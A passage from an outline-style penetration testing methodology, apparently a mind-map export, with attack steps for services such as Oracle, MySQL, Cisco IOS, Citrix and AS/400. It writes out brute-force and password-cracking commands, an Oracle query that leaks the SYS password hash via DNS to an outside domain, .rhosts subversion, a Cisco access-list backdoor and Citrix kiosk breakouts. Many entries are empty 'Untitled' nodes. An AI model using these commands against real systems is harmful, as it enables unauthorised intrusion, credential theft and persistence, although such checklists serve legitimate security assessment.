14.14.3.4. Netscape Directory Server 4
14.14.3.4.1. nsslapd.sas_at.conf
14.14.3.4.2. nsslapd.sas_oc.conf
14.14.3.5. OpenLDAP directory server
14.14.3.5.1. slapd.sas_at.conf
14.14.3.5.2. slapd.sas_oc.conf
14.14.3.6. Sun ONE Directory Server 5.1
14.14.3.6.1. 75sas.ldif
14.15. PPTP/L2TP/VPN port 500/1723 open
14.15.1. Enumeration
14.15.1.1. ike-scan
14.15.1.2. ike-probe
14.15.2. Brute-Force
14.15.2.1. ike-crack
14.15.3. Reference Material
14.15.3.1. PSK cracking paper
14.15.3.2. SecurityFocus Infocus
14.15.3.3. Scanning a VPN Implementation
14.16. Modbus port 502 open
14.16.1. modscan
14.17. rlogin port 513 open
14.17.1. Rlogin Enumeration
14.17.1.1. Find the files
14.17.1.1.1. find / -name .rhosts
14.17.1.1.2. locate .rhosts
14.17.1.2. Examine Files
14.17.1.2.1. cat .rhosts
14.17.1.3. Manual Login
14.17.1.3.1. rlogin hostname -l username
14.17.1.3.2. rlogin <IP>
14.17.1.4. Subvert the files
14.17.1.4.1. echo ++ > .rhosts
14.17.2. Rlogin Brute force
14.17.2.1. Hydra
14.18. rsh port 514 open
14.18.1. Rsh Enumeration
14.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
14.18.2. Rsh Brute Force
14.18.2.1. rsh-grind
14.18.2.2. Hydra
14.18.2.3. medusa
14.19. SQL Server Port 1433 1434 open
14.19.1. SQL Enumeration
14.19.1.1. piggy
14.19.1.2. SQLPing
14.19.1.2.1. sqlping ip_address/hostname
14.19.1.3. SQLPing2
14.19.1.4. SQLPing3
14.19.1.5. SQLpoke
14.19.1.6. SQL Recon
14.19.1.7. SQLver
14.19.2. SQL Brute Force
14.19.2.1. SQLPAT
14.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
14.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
14.19.2.2. SQL Dict
14.19.2.3. SQLAT
14.19.2.4. Hydra
14.19.2.5. SQLlhf
14.19.2.6. ForceSQL
14.20. Citrix port 1494 open
14.20.1. Citrix Enumeration
14.20.1.1. Default Domain
14.20.1.2. Published Applications
14.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]
14.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
14.20.2. Citrix Brute Force
14.20.2.1. bforce.js
14.20.2.2. connect.js
14.20.2.3. Citrix Brute-forcer
14.20.2.4. Reference Material
14.20.2.4.1. Hacking Citrix - the legitimate backdoor
14.20.2.4.2. Hacking Citrix - the forceful way
14.21. Oracle Port 1521 Open
14.21.1. Oracle Enumeration
14.21.1.1. oracsec
14.21.1.2. Repscan
14.21.1.3. Sidguess
14.21.1.4. Scuba
14.21.1.5. DNS/HTTP Enumeration
14.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
14.21.1.5.2. Untitled
14.21.1.6. WinSID
14.21.1.7. Oracle default password list
14.21.1.8. TNSVer
14.21.1.8.1. tnsver host [port]
14.21.1.9. TCP Scan
14.21.1.10. Oracle TNSLSNR
14.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
14.21.1.11. TNSCmd
14.21.1.11.1. perl tnscmd.pl -h ip_address
14.21.1.11.2. perl tnscmd.pl version -h ip_address
14.21.1.11.3. perl tnscmd.pl status -h ip_address
14.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
14.21.1.12. LSNrCheck
14.21.1.13. Oracle Security Check (needs credentials)
14.21.1.14. OAT
14.21.1.14.1. sh opwg.sh -s ip_address
14.21.1.14.2. opwg.bat -s ip_address
14.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
14.21.1.15. OScanner
14.21.1.15.1. sh oscanner.sh -s ip_address
14.21.1.15.2. oscanner.exe -s ip_address
14.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml
14.21.1.15.4. reportviewer.exe oscanner_saved_file.xml
14.21.1.16. NGS Squirrel for Oracle
14.21.1.17. Service Register
14.21.1.17.1. Service-register.exe ip_address
14.21.1.18. PLSQL Scanner 2008
14.21.2. Oracle Brute Force
14.21.2.1. OAK
14.21.2.1.1. ora-getsid hostname port sid_dictionary_list
14.21.2.1.2. ora-auth-alter-session host port sid username password sql
14.21.2.1.3. ora-brutesid host port start
14.21.2.1.4. ora-pwdbrute host port sid username password-file
14.21.2.1.5. ora-userenum host port sid userlistfile
14.21.2.1.6. ora-ver -e (-f -l -a) host port
14.21.2.2. breakable (Targets Application Server Port)
14.21.2.2.1. breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
14.21.2.3. SQLInjector (Targets Application Server Port)
14.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
14.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
14.21.2.4. Check Password
14.21.2.5. orabf
14.21.2.5.1. orabf [hash]:[username] [options]
14.21.2.6. thc-orakel
14.21.2.6.1. Cracker
14.21.2.6.2. Client
14.21.2.6.3. Crypto
14.21.2.7. DBVisualisor
14.21.2.7.1. Sql scripts from pentest.co.uk
14.21.2.7.2. Manual sql input of previously reported vulnerabilties
14.21.3. Oracle Reference Material
14.21.3.1. Understanding SQL Injection
14.21.3.2. SQL Injection walkthrough
14.21.3.3. SQL Injection by example
14.21.3.4. Advanced SQL Injection in Oracle databases
14.21.3.5. Blind SQL Injection
14.21.3.6. SQL Cheatsheets
14.21.3.6.1. Untitled
14.22. NFS Port 2049 open
14.22.1. NFS Enumeration
14.22.1.1. showmount -e hostname/ip_address
14.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point
14.22.2. NFS Brute Force
14.22.2.1. Interact with NFS share and try to add/delete
14.22.2.2. Exploit and Confuse Unix
14.22.3. Examine Configuration Files
14.22.3.1. /etc/exports
14.22.3.2. /etc/lib/nfs/xtab
14.22.4. nmap nse script
14.22.4.1. nfs-showmount
14.23. Compaq/HP Insight Manager Port 2301,2381open
14.23.1. HP Enumeration
14.23.1.1. Authentication Method
14.23.1.1.1. Host OS Authentication
14.23.1.1.2. Default Authentication
14.23.1.2. Wikto
14.23.1.3. Nstealth
14.23.2. HP Bruteforce
14.23.2.1. Hydra
14.23.2.2. Acunetix
14.23.3. Examine Configuration Files
14.23.3.1. path.properties
14.23.3.2. mx.log
14.23.3.3. CLIClientConfig.cfg
14.23.3.4. database.props
14.23.3.5. pg_hba.conf
14.23.3.6. jboss-service.xml
14.23.3.7. .namazurc
14.24. MySQL port 3306 open
14.24.1. Enumeration
14.24.1.1. nmap -A -n -p3306 <IP Address>
14.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>
14.24.1.3. telnet IP_Address 3306
14.24.1.4. use test; select * from test;
14.24.1.5. To check for other DB's -- show databases
14.24.2. Administration
14.24.2.1. MySQL Network Scanner
14.24.2.2. MySQL GUI Tools
14.24.2.3. mysqlshow
14.24.2.4. mysqlbinlog
14.24.3. Manual Checks
14.24.3.1. Default usernames and passwords
14.24.3.1.1. username: root password:
14.24.3.1.2. testing
14.24.3.2. Configuration Files
14.24.3.2.1. Operating System
14.24.3.2.2. Command History
14.24.3.2.3. Log Files
14.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql
14.24.3.2.5. MySQL data directory (Location specified in my.cnf)
14.24.3.2.6. SSL Check
14.24.3.3. Privilege Escalation
14.24.3.3.1. Current Level of access
14.24.3.3.2. Access passwords
14.24.3.3.3. Create a new user and grant him privileges
14.24.3.3.4. Break into a shell
14.24.4. SQL injection
14.24.4.1. mysql-miner.pl
14.24.4.1.1. mysql-miner.pl http://target/ expected_string database
14.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
14.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
14.24.5. References.
14.24.5.1. Design Weaknesses
14.24.5.1.1. MySQL running as root
14.24.5.1.2. Exposed publicly on Internet
14.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
14.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
14.25. RDesktop port 3389 open
14.25.1. Rdesktop Enumeration
14.25.1.1. Remote Desktop Connection
14.25.2. Rdestop Bruteforce
14.25.2.1. TSGrinder
14.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
14.25.2.2. Tscrack
14.26. Sybase Port 5000+ open
14.26.1. Sybase Enumeration
14.26.1.1. sybase-version ip_address from NGS
14.26.2. Sybase Vulnerability Assessment
14.26.2.1. Use DBVisualiser
14.26.2.1.1. Sybase Security checksheet
14.26.2.1.2. Manual sql input of previously reported vulnerabilties
14.26.2.2. NGS Squirrel for Sybase
14.27. SIP Port 5060 open
14.27.1. SIP Enumeration
14.27.1.1. netcat
14.27.1.1.1. nc IP_Address Port
14.27.1.2. sipflanker
14.27.1.2.1. python sipflanker.py 192.168.1-254
14.27.1.3. Sipscan
14.27.1.4. smap
14.27.1.4.1. smap IP_Address/Subnet_Mask
14.27.1.4.2. smap -o IP_Address/Subnet_Mask
14.27.1.4.3. smap -l IP_Address
14.27.2. SIP Packet Crafting etc.
14.27.2.1. sipsak
14.27.2.1.1. Tracing paths: - sipsak -T -s sip:usernaem@domain
14.27.2.1.2. Options request:- sipsak -vv -s sip:username@domain
14.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
14.27.2.2. siprogue
14.27.3. SIP Vulnerability Scanning/ Brute Force
14.27.3.1. tftp bruteforcer
14.27.3.1.1. Default dictionary file
14.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
14.27.3.2. VoIPaudit
14.27.3.3. SiVuS
14.27.4. Examine Configuration Files
14.27.4.1. SIPDefault.cnf
14.27.4.2. asterisk.conf
14.27.4.3. sip.conf
14.27.4.4. phone.conf
14.27.4.5. sip_notify.conf
14.27.4.6. <Ethernet address>.cfg
14.27.4.7. 000000000000.cfg
14.27.4.8. phone1.cfg
14.27.4.9. sip.cfg etc. etc.
14.28. VNC port 5900^ open
14.28.1. VNC Enumeration
14.28.1.1. Scans
14.28.1.1.1. 5900^ for direct access.5800 for HTTP access.
14.28.2. VNC Brute Force
14.28.2.1. Password Attacks
14.28.2.1.1. Remote
14.28.2.1.2. Local
14.28.3. Exmine Configuration Files
14.28.3.1. .vnc
14.28.3.2. /etc/vnc/config
14.28.3.3. $HOME/.vnc/config
14.28.3.4. /etc/sysconfig/vncservers
14.28.3.5. /etc/vnc.conf
14.29. Tor Port 9001, 9030 open
14.29.1. Tor Node Checker
14.29.1.1. Ip Pages
14.29.1.2. Kewlio.net
14.29.2. nmap NSE script
14.30. Jet Direct 9100 open
14.30.1. hijetta
15. Password cracking
15.1. Rainbow crack
15.1.1. ophcrack
15.1.2. rainbow tables
15.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt
15.2. Ophcrack
15.3. Cain & Abel
15.4. John the Ripper
15.4.1. ./unshadow passwd shadow > file_to_crack
15.4.2. ./john -single file_to_crack
15.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack
15.4.4. ./john -show file_to_crack
15.4.5. ./john --incremental:All file_to_crack
15.5. fgdump
15.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt
15.6. pwdump6
15.7. medusa
15.8. LCP
15.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada
15.9.1. Domain credentials
15.9.2. Sniffing
15.9.3. pwdump import
15.9.4. sam import
15.10. aiocracker
15.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list
16. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.
16.1. Manual
16.1.1. Patch Levels
16.1.2. Confirmed Vulnerabilities
16.1.2.1. Severe
16.1.2.2. High
16.1.2.3. Medium
16.1.2.4. Low
16.2. Automated
16.2.1. Reports
16.2.2. Vulnerabilities
16.2.2.1. Severe
16.2.2.2. High
16.2.2.3. Medium
16.2.2.4. Low
16.3. Tools
16.3.1. GFI
16.3.2. Nessus (Linux)
16.3.2.1. Nessus (Windows)
16.3.3. NGS Typhon
16.3.4. NGS Squirrel for Oracle
16.3.5. NGS Squirrel for SQL
16.3.6. SARA
16.3.7. MatriXay
16.3.8. BiDiBlah
16.3.9. SSA
16.3.10. Oval Interpreter
16.3.11. Xscan
16.3.12. Security Manager +
16.3.13. Inguma
16.4. Resources
16.4.1. Security Focus
16.4.2. Microsoft Security Bulletin
16.4.3. Common Vulnerabilities and Exploits (CVE)
16.4.4. National Vulnerability Database (NVD)
16.4.5. The Open Source Vulnerability Database (OSVDB)
16.4.5.1. Standalone Database
16.4.5.1.1. Update URL
16.4.6. United States Computer Emergency Response Team (US-CERT)
16.4.7. Computer Emergency Response Team
16.4.8. Mozilla Security Information
16.4.9. SANS
16.4.10. Securiteam
16.4.11. PacketStorm Security
16.4.12. Security Tracker
16.4.13. Secunia
16.4.14. Vulnerabilities.org
16.4.15. ntbugtraq
16.4.16. Wireless Vulnerabilities and Exploits (WVE)
16.5. Blogs
16.5.1. Carnal0wnage
16.5.2. Fsecure Blog
16.5.3. g0ne blog
16.5.4. GNUCitizen
16.5.5. ha.ckers Blog
16.5.6. Jeremiah Grossman Blog
16.5.7. Metasploit
16.5.8. nCircle Blogs
16.5.9. pentest mokney.net
16.5.10. Rational Security
16.5.11. Rational Security
16.5.12. Rise Security
16.5.13. Security Fix Blog
16.5.14. Software Vulnerability Exploitation Blog
16.5.15. Software Vulnerability Exploitation Blog
16.5.16. Taosecurity Blog
17. AS/400 Auditing
17.1. Remote
17.1.1. Information Gathering
17.1.1.1. Nmap using common iSeries (AS/400) services.
17.1.1.1.1. Unsecured services (Port;name;description)
17.1.1.1.2. Secured services (Port;name;description)
17.1.1.2. NetCat (old school technique)
17.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"
17.1.1.3. Banners Grabbing
17.1.1.3.1. Telnet
17.1.1.3.2. FTP
17.1.1.3.3. HTTP Banner
17.1.1.3.4. POP3
17.1.1.3.5. SNMP
17.1.1.3.6. SMTP
17.1.2. Users Enumeration
17.1.2.1. Default AS/400 users accounts
17.1.2.2. Error messages
17.1.2.2.1. Telnet Login errors
17.1.2.2.2. POP3 authentication Errors
17.1.2.3. Qsys symbolic link (if ftp is enabled)
17.1.2.3.1. ftp target | quote stat | quote site namefmt 1
17.1.2.3.2. cd /
17.1.2.3.3. quote site listfmt 1
17.1.2.3.4. mkdir temp
17.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')
17.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')
17.1.2.3.7. dir /temp/qsys/*.usrprf
17.1.2.4. LDAP
17.1.2.4.1. Need os400-sys value from ibm-slapdSuffix
17.1.2.4.2. Tool to browse LDAP
17.1.3. Exploitation
17.1.3.1. CVE References
17.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400
17.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0
17.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3
17.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3
17.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0
17.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0
17.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3
17.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0
17.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3
17.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3
17.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3
17.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0
17.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3
17.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3
17.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3
17.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3
17.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3
17.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3
17.1.3.2. Access with Work Station Gateway
17.1.3.2.1. http://target:5061/WSG
17.1.3.2.2. Default AS/400 accounts.
17.1.3.3. Network attacks (next release)
17.1.3.3.1. DB2
17.1.3.3.2. QSHELL
17.1.3.3.3. Hijacking Terminals
17.1.3.3.4. Trojan attacks
17.1.3.3.5. Hacking from AS/400
17.2. Local
17.2.1. System Value Security
17.2.1.1. Untitled
17.2.1.1.1. Untitled
17.2.1.2. Untitled
17.2.1.2.1. Untitled
17.2.1.3. Untitled
17.2.1.3.1. Untitled
17.2.1.4. Untitled
17.2.1.4.1. Recommended value is 30
17.2.2. Password Policy
17.2.2.1. Untitled
17.2.2.1.1. Untitled
17.2.2.1.2. Untitled
17.2.2.2. Untitled
17.2.2.2.1. Untitled
17.2.2.3. Untitled
17.2.2.3.1. Untitled
17.2.2.4. Untitled
17.2.2.4.1. Untitled
17.2.2.5. Untitled
17.2.3. Audit level
17.2.3.1. Untitled
17.2.3.1.1. Recommended value is *SECURITY
17.2.4. Documentation
17.2.4.1. Users class
17.2.4.1.1. Untitled
17.2.4.2. System Audit Settings
17.2.4.2.1. Untitled
17.2.4.3. Special Authorities Definitions
17.2.4.3.1. Untitled
18. Bluetooth Specific Testing
18.1. Bluescanner
18.2. Bluesweep
18.3. btscanner
18.4. Redfang
18.5. Blueprint
18.6. Bluesnarfer
18.7. Bluebugger
18.7.1. bluebugger [OPTIONS] -a <addr> [MODE]
18.8. Blueserial
18.9. Bloover
18.10. Bluesniff
18.11. Exploit Frameworks
18.11.1. BlueMaho
18.11.1.1. Untitled
18.12. Resources
18.12.1. URL's
18.12.1.1. BlueStumbler.org
18.12.1.2. Bluejackq.com
18.12.1.3. Bluejacking.com
18.12.1.4. Bluejackers
18.12.1.5. bluetooth-pentest
18.12.1.6. ibluejackedyou.com
18.12.1.7. Trifinite
18.12.2. Vulnerability Information
18.12.2.1. Common Vulnerabilities and Exploits (CVE)
18.12.2.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth
18.12.3. White Papers
18.12.3.1. Bluesnarfing
19. Cisco Specific Testing
19.1. Methodology
19.1.1. Scan & Fingerprint.
19.1.1.1. Untitled
19.1.1.2. Untitled
19.1.1.3. If SNMP is active, then community string guessing should be performed.
19.1.2. Credentials Guessing.
19.1.2.1. Untitled
19.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!
19.1.3. Connect
19.1.3.1. Untitled
19.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.
19.1.4. Check for bugs
19.1.4.1. Untitled
19.1.4.1.1. The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact.
19.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
19.1.5. Further your attack
19.1.5.1. Untitled
19.1.5.1.1. running-config is the currently running configuration settings. This gets loaded from the startup-config on boot. This configuration file is editable and the changes are immediate. Any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permenant connection through to the internal network.
19.1.5.1.2. startup-config is the boot up configuration file. It is this file that needs altering to maintain a permenant connection through to the internal network.
19.1.5.2. Untitled
19.1.5.2.1. #> access-list 100 permit ip <IP> any
19.2. Scan & Fingerprint.
19.2.1. Port Scanning
19.2.1.1. nmap
19.2.1.1.1. Untitled
19.2.1.2. Other tools
19.2.1.2.1. Untitled
19.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
19.2.2. Fingerprinting
19.2.2.1. Untitled
19.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175
19.2.2.2. Untitled
19.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt
19.2.2.2.2. Untitled
19.3. Password Guessing.
19.3.1. Untitled
19.3.1.1. ./CAT -h <IP> -a password.wordlist
19.3.1.2. Untitled
19.3.2. Untitled
19.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]
19.3.2.2. Untitled
19.3.3. Untitled
19.3.3.1. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
19.3.3.2. Untitled
19.4. SNMP Attacks.
19.4.1. Untitled
19.4.1.1. ./CAT -h <IP> -w SNMP.wordlist
19.4.1.2. Untitled
19.4.2. Untitled
19.4.2.1. onesixytone -c SNMP.wordlist <IP>
19.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
19.4.3. Untitled
19.4.3.1. snmapwalk -v <Version> -c <Community string> <IP>
19.4.3.2. Untitled
19.5. Connecting.
19.5.1. Telnet
19.5.1.1. Untitled
19.5.1.1.1. telnet <IP>
19.5.1.1.2. Sample Banners
19.5.2. SSH
19.5.3. Web Browser
19.5.3.1. Untitled
19.5.3.1.1. This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:
19.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:
19.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
19.5.4. TFTP
19.5.4.1. Untitled
19.5.4.1.1. Untitled
19.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names.
19.5.4.2. Untitled
19.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>
19.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>
19.5.4.2.3. Creating backdoors in Cisco IOS using TCL
19.6. Known Bugs.
19.6.1. Attack Tools
19.6.1.1. Untitled
19.6.1.1.1. Untitled
19.6.1.2. Untitled
19.6.1.2.1. Web browse to the Cisco device: http://<IP>
19.6.1.2.2. Untitled
19.6.1.2.3. Untitled
19.6.1.2.4. Untitled
19.6.1.3. Untitled
19.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt
19.6.2. Common Vulnerabilities and Exploits (CVE) Information
19.6.2.1. Vulnerabilties and exploit information relating to these products can be found here:http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS
19.7. Configuration Files.
19.7.1. Untitled
19.7.1.1. Configuration files explained
19.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access.
19.7.1.1.2. Untitled
19.7.1.1.3. Untitled
19.7.1.1.4. Password Encryption Utilised
19.7.1.1.5. Untitled
19.7.1.2. Configuration Testing Tools
19.7.1.2.1. Nipper
19.7.1.2.2. fwauto (Beta)
19.8. References.
19.8.1. Cisco IOS Exploitation Techniques
20. Citrix Specific Testing
20.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix
20.2. Enumeration
20.2.1. web search
20.2.1.1. Google (GHDB)
20.2.1.1.1. ext:ica
20.2.1.1.2. inurl:citrix/metaframexp/default/login.asp
20.2.1.1.3. [WFClient] Password= filetype:ica
20.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On
20.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"
20.2.1.1.6. inurl:/Citrix/Nfuse17/
20.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx
20.2.1.2. Google Hacks (Author Discovered)
20.2.1.2.1. filetype:ica Username=
20.2.1.2.2. inurl:Citrix/AccessPlatform/auth/login.aspx
20.2.1.2.3. inurl:/Citrix/AccessPlatform/
20.2.1.2.4. inurl:LogonAgent/Login.asp
20.2.1.2.5. inurl:/CITRIX/NFUSE/default/login.asp
20.2.1.2.6. inurl:/Citrix/NFuse161/login.asp
20.2.1.2.7. inurl:/Citrix/NFuse16
20.2.1.2.8. inurl:/Citrix/NFuse151/
20.2.1.2.9. allintitle:MetaFrame XP Login
20.2.1.2.10. allintitle:MetaFrame Presentation Server Login
20.2.1.2.11. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On
20.2.1.2.12. allintitle:Citrix(R) NFuse(TM) Classic Login
20.2.1.3. Yahoo
20.2.1.3.1. originurlextension:ica
20.2.2. site search
20.2.2.1. Manual
20.2.2.1.1. review web page for useful information
20.2.2.1.2. review source for web page
20.2.3. generic
20.2.3.1. nmap -A -PN -p 80,443,1494 ip_address
20.2.3.2. amap -bqv ip_address port_no.
20.2.4. citrix specific
20.2.4.1. enum.pl
20.2.4.1.1. perl enum.pl ip_address
20.2.4.2. enum.js
20.2.4.2.1. enum.js apps TCPBrowserAdress=ip_address
20.2.4.3. connect.js
20.2.4.3.1. connect.js TCPBrowserAdress=ip_address Application=advertised-application
20.2.4.4. Citrix-pa-scan
20.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri
20.2.4.5. pabrute.c
20.2.4.5.1. ./pabrute pubapp list app_list ip_address
20.2.5. Default Ports
20.2.5.1. TCP
20.2.5.1.1. Citrix XML Service
20.2.5.1.2. Advanced Management Console
20.2.5.1.3. Citrix SSL Relay
20.2.5.1.4. ICA sessions
20.2.5.1.5. Server to server
20.2.5.1.6. Management Console to server
20.2.5.1.7. Session Reliability (Auto-reconnect)
20.2.5.1.8. License Management Console
20.2.5.1.9. License server
20.2.5.2. UDP
20.2.5.2.1. Clients to ICA browser service
20.2.5.2.2. Server-to-server
20.2.6. nmap nse scripts
20.2.6.1. citrix-enum-apps
20.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>
20.2.6.2. citrix-enum-apps-xml
20.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>
20.2.6.3. citrix-enum-servers
20.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604
20.2.6.4. citrix-enum-servers-xml
20.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>
20.2.6.5. citrix-brute-xml
20.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>
20.3. Scanning
20.3.1. Nessus
20.3.1.1. Plugins
20.3.1.1.1. CGI abuses
20.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)
20.3.1.1.3. Misc.
20.3.1.1.4. Service Detection
20.3.1.1.5. Web Servers
20.3.1.1.6. Windows
20.3.2. Nikto
20.3.2.1. perl nikto.pl -host ip_address -port port_no.
20.3.2.1.1. Untitled
20.4. Exploitation
20.4.1. Alter default .ica files
20.4.1.1. InitialProgram=cmd.exe
20.4.1.2. InitialProgram=explorer.exe
20.4.2. Enumerate and Connect
20.4.2.1. For applications identified by Citrix-pa-scan
20.4.2.1.1. Pas
20.4.2.2. For published applications with a Citrix client when the master browser is non-public.
20.4.2.2.1. Citrix-pa-proxy
20.4.3. Manual Testing
20.4.3.1. Create Batch File (cmd.bat)
20.4.3.1.1. 1
20.4.3.1.2. 2
20.4.3.2. Host Scripting File (cmd.vbs)
20.4.3.2.1. Option Explicit
20.4.3.2.2. Dim objShell
20.4.3.2.3. objShell.Run "%comspec% /k"
20.4.3.2.4. WScript.Quit
20.4.3.2.5. alternative functionality
20.4.3.3. iKat
20.4.3.3.1. Integrated Kiosk Attack Tool
20.4.3.4. AT Command - priviledge escalation
20.4.3.4.1. AT HH:MM /interactive "cmd.exe"
20.4.3.4.2. AT HH:MM /interactive %comspec% /k
20.4.3.4.3. Untitled
20.4.3.5. Keyboard Shortcuts/ Hotkeys
